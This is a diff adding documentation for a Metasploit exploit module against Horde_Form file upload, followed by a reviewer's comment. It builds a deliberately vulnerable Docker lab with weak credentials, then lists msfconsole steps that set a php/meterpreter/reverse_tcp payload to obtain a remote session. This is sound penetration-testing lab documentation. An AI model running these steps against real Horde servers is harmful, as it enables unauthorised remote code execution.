documentation/modules/exploit/multi/http/horde_form_file_upload.md

```diff
@@ -0,0 +1,97 @@
+2. Open a terminal, and enter: ```sudo apt-get install docker.io```. Make sure Docker is properly configured and your current user has permession to use it.
+3. Enter: ```mkdir horde_form_file_upload``` to create a folder.
+4. Enter: ```cd horde_form_file_upload``` to enter that folder.
+5. Create a ```Dockerfile``` in it with the following content.
+
+```
+FROM debian
+
+RUN apt-get update
+RUN apt-get install --yes --no-install-recommends \
+    apache2 \
+    ca-certificates \
+    dovecot-imapd \
+    libapache2-mod-php \
+    mysql-server \
+    php-mysqli \
+    php-pear \
+    rsyslog
+
+RUN pear upgrade PEAR
+RUN pear channel-discover pear.horde.org
+RUN pear install horde/horde_role
+RUN rm -r /var/www/html/ && mkdir /var/www/html/
+RUN echo /var/www/html/ | pear run-scripts horde/Horde_Role
+RUN pear install -a -B horde/webmail-5.2.22
+# Uninstall end reinstall the vulnerable version
+RUN pear uninstall -n horde/Horde_Form
+RUN pear install -a -B horde/Horde_Form-2.0.18 
+RUN sed -i "/'secure' => 'tls',/d" /var/www/html/imp/config/backends.php
+RUN chown -R www-data:www-data /var/www/html/
+
+RUN useradd -m -G mail user && echo 'user:user' | chpasswd
+
+RUN echo 'disable_plaintext_auth = no' | tee /etc/dovecot/conf.d/99-auth.conf
+
+ENTRYPOINT \
+           /etc/init.d/mysql start && \
+           echo 'CREATE DATABASE IF NOT EXISTS horde;' | mysql && \
+           echo 'CREATE USER IF NOT EXISTS horde;' | mysql && \
+           echo 'GRANT ALL ON horde.* TO horde IDENTIFIED BY "horde";' | mysql && \
+           { echo mysqli;    sleep 0.3; \
+             echo horde;     sleep 0.3; \
+             echo horde;     sleep 0.3; \
+             echo tcp;       sleep 0.3; \
+             echo localhost; sleep 0.3; \
+             echo;           sleep 0.3; \
+             echo horde;     sleep 0.3; \
+             echo;           sleep 0.3; \
+             echo false;     sleep 0.3; \
+             echo;           sleep 0.3; \
+             echo 1;         sleep 0.3; } | webmail-install && \
+           dovecot && \
+           /etc/init.d/apache2 start && \
+           tail -F /var/log/apache2/access.log /var/log/syslog
+```
+
+6. Enter: ```docker build . -t horde-img``` to build the Docker image.
+7. Enter: ```docker run -p8888:80 --name horde-inst horde-img``` to run the Docker instance with the name ```horde-inst```.
+8. Get the Docker host ip for reverse connection. In Linux, enter: ```ip -4 addr show docker0 | grep -Po 'inet \K[\d.]+'```.
+
+After setting up Horde, you can use your exploit module:
+
+1. Start msfconsole
+2. Do: ```use exploit/multi/http/horde_form_file_upload```
+3. Do: ```set RHOSTS 127.0.0.1```
+4. Do: ```set RPORT 8888```
+5. Do: ```set payload php/meterpreter/reverse_tcp```
+6. Do: ```set LHOST [HOST IP]```
+7. Do: ```set VHOST horde.lab```
+8. Do: ```set USERNAME user ```
+9. Do: ```set PASSWORD user```
+10. Do: ```exploit```
+11. And you should get a session
+
+## Demonstration
+
```

Comment:
Ad a level 3 heading with version of app, and version of OS (mention Docker if it's that, or that you used the instructions from the beginning of the doc)